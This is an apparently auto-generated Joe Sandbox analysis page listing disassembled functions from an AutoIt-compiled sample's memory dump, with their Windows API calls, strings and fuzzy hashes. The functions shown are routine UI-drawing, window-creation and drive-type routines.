Function 006A7920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2682e73c90935cb81071b203696f7424a8f9e5393670f8e715ce0c964669c7ab
Instruction ID: 65a85a3bf5d8183c74801eddc4f885e485ce097790ee045a365a61ab79144e6b
Opcode Fuzzy Hash: 2682e73c90935cb81071b203696f7424a8f9e5393670f8e715ce0c964669c7ab
Instruction Fuzzy Hash: 8C229DB0A00609EFDF14DF65C881AEEB3B6FF45304F244629E816A7291EB35AD51CB64

Function 006A91C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df6929ce3d09c3155040b8938f68079ebf2135513f1283fb70dd9234332f07ce
Instruction ID: 9fd039036daee3f621c8878ad3d88105c005a23417e5499c0ae179dc7eea6741
Opcode Fuzzy Hash: df6929ce3d09c3155040b8938f68079ebf2135513f1283fb70dd9234332f07ce
Instruction Fuzzy Hash: 1802A5B0A01205EBDF04DF65D881AAEB7B2FF44300F208169E8169B391EB75AE51CF95

Function 006C1C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: a513773043366fada7c78dd8e710db6c4ba83cfd859ed3bbff3a7af006f67eaf
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 619178725080A34AD72946398574A7DFFE2DE533A1319079DE4F3CE2C2EE24D565D620

Function 006C19B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 0f70d78959d114605e315d9d0a84cbd0ce762a29215d43539a28d53fb4fcb133
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 649157726090E34ADB2D427A857497DFFE2DA933A1319079DD4F2CE2C2FD24C965DA20

Function 006C7A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 813a7c83618a5536bec8805749762b389ef11958f66339e2548b3714930426c3
Instruction ID: 4f8bc44c35cc7858feb2a1cd85d9ce0b317653577311557f197a7e02adf79396
Opcode Fuzzy Hash: 813a7c83618a5536bec8805749762b389ef11958f66339e2548b3714930426c3
Instruction Fuzzy Hash: 1E61777120874AAADB349EA88995FFE239BDF51710F10091EF842CB381DA11EE428F59

Function 006C1706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: e68ed80ef0a088da0342b34574ad827fea8f388107a9294ac5e61759c1671c16
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 8D81657250D0A34ADB6D4239857497EFFE3DA933A131A079ED4F2CE2C2EE24C555E620

Function 006BD07D Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85af19d856045158542d46d3460f522a9c0a5c3f9b033d50eacd046f9317462a
Instruction ID: 98ee2e134a9d29ffcab5c1eee3dafb0a724a1b3746fb01e5ca31b30236d093e3
Opcode Fuzzy Hash: 85af19d856045158542d46d3460f522a9c0a5c3f9b033d50eacd046f9317462a
Instruction Fuzzy Hash: 0E51966154FEC6AFC30E9B34DA76144FF30BE6351030CC78FC8A54AA86D750A22AD795

Function 00722ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00722B30
DeleteObject.GDI32(00000000), ref: 00722B43
DestroyWindow.USER32 ref: 00722B52
GetDesktopWindow.USER32 ref: 00722B6D
GetWindowRect.USER32(00000000), ref: 00722B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00722CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00722CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00722CF8
GetClientRect.USER32(00000000,?), ref: 00722D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00722D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00722D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00722D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00722D80
GlobalLock.KERNEL32(00000000), ref: 00722D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00722D98
GlobalUnlock.KERNEL32(00000000), ref: 00722DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00722DA8
GlobalFree.KERNEL32(00000000), ref: 00722DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00722DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,0073FC38,00000000), ref: 00722DDB
GlobalFree.KERNEL32(00000000), ref: 00722DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00722E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00722E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00722E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0072303F

Strings

, xrefs: 00722FC5
DISPLAY, xrefs: 00722EA2
AutoIt v3, xrefs: 00722CF2
static, xrefs: 00722D3A, 00722E91

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: a109d62a8243cefa5a1e1e4abd9ec8762a30b42ce6ab3ceaa7c2f7f1cf928d64
Instruction ID: e56921f9047e533a0eee8d29a38362c8bec45a93e3b58d7e64c4b110b4e077ba
Opcode Fuzzy Hash: a109d62a8243cefa5a1e1e4abd9ec8762a30b42ce6ab3ceaa7c2f7f1cf928d64
Instruction Fuzzy Hash: C0028F71900214EFDB15DF64DC89EAE7BB9EB49311F048118F915AB2A2DB38DD41CF64

Function 007370D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0073712F
GetSysColorBrush.USER32(0000000F), ref: 00737160
GetSysColor.USER32(0000000F), ref: 0073716C
SetBkColor.GDI32(?,000000FF), ref: 00737186
SelectObject.GDI32(?,?), ref: 00737195
InflateRect.USER32(?,000000FF,000000FF), ref: 007371C0
GetSysColor.USER32(00000010), ref: 007371C8
CreateSolidBrush.GDI32(00000000), ref: 007371CF
FrameRect.USER32(?,?,00000000), ref: 007371DE
DeleteObject.GDI32(00000000), ref: 007371E5
InflateRect.USER32(?,000000FE,000000FE), ref: 00737230
FillRect.USER32(?,?,?), ref: 00737262
GetWindowLongW.USER32(?,000000F0), ref: 00737284

Part of subcall function 007373E8: GetSysColor.USER32(00000012), ref: 00737421
Part of subcall function 007373E8: SetTextColor.GDI32(?,?), ref: 00737425
Part of subcall function 007373E8: GetSysColorBrush.USER32(0000000F), ref: 0073743B
Part of subcall function 007373E8: GetSysColor.USER32(0000000F), ref: 00737446
Part of subcall function 007373E8: GetSysColor.USER32(00000011), ref: 00737463
Part of subcall function 007373E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00737471
Part of subcall function 007373E8: SelectObject.GDI32(?,00000000), ref: 00737482
Part of subcall function 007373E8: SetBkColor.GDI32(?,00000000), ref: 0073748B
Part of subcall function 007373E8: SelectObject.GDI32(?,?), ref: 00737498
Part of subcall function 007373E8: InflateRect.USER32(?,000000FF,000000FF), ref: 007374B7
Part of subcall function 007373E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007374CE
Part of subcall function 007373E8: GetWindowLongW.USER32(00000000,000000F0), ref: 007374DB

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: e56aa53b324c2fffc7219235227e8a60ee8ad46ba559933bedc15a5028c87129
Instruction ID: 37cae0a67883ee1fb94f064bb539291f1f637889bf192c9cd7dfef3ebe438560
Opcode Fuzzy Hash: e56aa53b324c2fffc7219235227e8a60ee8ad46ba559933bedc15a5028c87129
Instruction Fuzzy Hash: 09A1C2B2008305EFEB159F60DC48E5B7BB9FB88321F104A19F9A2A61E1D779E840DB51

Function 006B8D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 006B8E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 006F6AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 006F6AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 006F6F43

Part of subcall function 006B8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,006B8BE8,?,00000000,?,?,?,?,006B8BBA,00000000,?), ref: 006B8FC5

SendMessageW.USER32(?,00001053), ref: 006F6F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 006F6F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 006F6FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 006F6FB7

Strings

0, xrefs: 006F6DCF

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: 5ea91b67da507c2e4b6e4ed10e4376fdedfe86dbc26071c898a1d78a0b599ace
Instruction ID: 83ce66b5ccfac9bb31bbf6b38032168892e0502141556a722dc48e12c407587a
Opcode Fuzzy Hash: 5ea91b67da507c2e4b6e4ed10e4376fdedfe86dbc26071c898a1d78a0b599ace
Instruction Fuzzy Hash: E312A870204255EFDB25DF28C884BFAB7A6FF44300F548469F6899B261CB35E892CF95

Function 00722711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0072273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0072286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 007228A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 007228B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00722900
GetClientRect.USER32(00000000,?), ref: 0072290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00722955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00722964
GetStockObject.GDI32(00000011), ref: 00722974
SelectObject.GDI32(00000000,00000000), ref: 00722978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00722988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00722991
DeleteDC.GDI32(00000000), ref: 0072299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007229C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 007229DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00722A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00722A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00722A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00722A77
GetStockObject.GDI32(00000011), ref: 00722A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00722A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00722A97

Strings

DISPLAY, xrefs: 0072295A
AutoIt v3, xrefs: 007228F8
msctls_progress32, xrefs: 00722A13
static, xrefs: 0072294F, 00722A71

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: da76caf5ee2c9cac1836dcd2884e4adabb05adb5a1fc766797fda0261d378f3c
Instruction ID: 28e0d2cd8ab9de0a78fc16ee08eb80f2a099983394612d1d088f0014fbc8479c
Opcode Fuzzy Hash: da76caf5ee2c9cac1836dcd2884e4adabb05adb5a1fc766797fda0261d378f3c
Instruction Fuzzy Hash: 1AB15EB1A00215BFEB14DF68DC86FAE7BA9EB05711F008118F915E7291D778ED40CBA4

Function 00714ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00714AED
GetDriveTypeW.KERNEL32(?,0073CB68,?,\\.\,0073CC08), ref: 00714BCA
SetErrorMode.KERNEL32(00000000,0073CB68,?,\\.\,0073CC08), ref: 00714D36

Strings

RAMDisk, xrefs: 00714BF4
1394, xrefs: 00714C9F
Unknown, xrefs: 00714BED, 00714C83
Removable, xrefs: 00714C10, 00714C15
PhysicalDrive, xrefs: 00714B76
CDROM, xrefs: 00714BFB
USB, xrefs: 00714CB4
iSCSI, xrefs: 00714CC2
SSD, xrefs: 00714C4A
SCSI, xrefs: 00714C8A
Fibre, xrefs: 00714CAD
SSA, xrefs: 00714CA6
MMC, xrefs: 00714CDE
ATAPI, xrefs: 00714C91
FileBackedVirtual, xrefs: 00714CEC
\\.\, xrefs: 00714B3F
ATA, xrefs: 00714C98
Virtual, xrefs: 00714CE5
SATA, xrefs: 00714CD0
Fixed, xrefs: 00714C09
SAS, xrefs: 00714CC9
RAID, xrefs: 00714CBB
Network, xrefs: 00714C02

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 4087cabfc0989cecce256fc95e54b0a9dceafaa3f369776943b70f5a86393360
Instruction ID: 8cf435041efa109be069e1ccf4fe5cf1c9d552c8c2fbcb8ead83f7d99604e223
Opcode Fuzzy Hash: 4087cabfc0989cecce256fc95e54b0a9dceafaa3f369776943b70f5a86393360
Instruction Fuzzy Hash: 8761AFB0705105DBCF14EF2CCA919E8B7B1AB45740B648019F807AB6D1DB2DED81DBA1

Function 007373E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00737421
SetTextColor.GDI32(?,?), ref: 00737425
GetSysColorBrush.USER32(0000000F), ref: 0073743B
GetSysColor.USER32(0000000F), ref: 00737446
CreateSolidBrush.GDI32(?), ref: 0073744B
GetSysColor.USER32(00000011), ref: 00737463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00737471
SelectObject.GDI32(?,00000000), ref: 00737482
SetBkColor.GDI32(?,00000000), ref: 0073748B
SelectObject.GDI32(?,?), ref: 00737498
InflateRect.USER32(?,000000FF,000000FF), ref: 007374B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007374CE
GetWindowLongW.USER32(00000000,000000F0), ref: 007374DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0073752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00737554
InflateRect.USER32(?,000000FD,000000FD), ref: 00737572
DrawFocusRect.USER32(?,?), ref: 0073757D
GetSysColor.USER32(00000011), ref: 0073758E
SetTextColor.GDI32(?,00000000), ref: 00737596
DrawTextW.USER32(?,007370F5,000000FF,?,00000000), ref: 007375A8
SelectObject.GDI32(?,?), ref: 007375BF
DeleteObject.GDI32(?), ref: 007375CA
SelectObject.GDI32(?,?), ref: 007375D0
DeleteObject.GDI32(?), ref: 007375D5
SetTextColor.GDI32(?,?), ref: 007375DB
SetBkColor.GDI32(?,?), ref: 007375E5

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 6825e525d909e4c1fb5cbda71ee882c3024d1ffe6a46702e1bde162e137936c0
Instruction ID: e0a3a3e54a0c2ab29dc5b81ade326b15148263bb21b598bd37053bc0d38ebf17
Opcode Fuzzy Hash: 6825e525d909e4c1fb5cbda71ee882c3024d1ffe6a46702e1bde162e137936c0
Instruction Fuzzy Hash: 586172B2900218AFEF159FA4DC49EEE7FB9EB08321F108115F911BB2A1D7799940DF94

Function 00730FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00731128
GetDesktopWindow.USER32 ref: 0073113D
GetWindowRect.USER32(00000000), ref: 00731144
GetWindowLongW.USER32(?,000000F0), ref: 00731199
DestroyWindow.USER32(?), ref: 007311B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007311ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0073120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0073121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 00731232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00731245
IsWindowVisible.USER32(00000000), ref: 007312A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 007312BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 007312D0
GetWindowRect.USER32(00000000,?), ref: 007312E8
MonitorFromPoint.USER32(?,?,00000002), ref: 0073130E
GetMonitorInfoW.USER32(00000000,?), ref: 00731328
CopyRect.USER32(?,?), ref: 0073133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 007313AA

Strings

(, xrefs: 0073131B
tooltips_class32, xrefs: 007311E6
0, xrefs: 007310D3

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
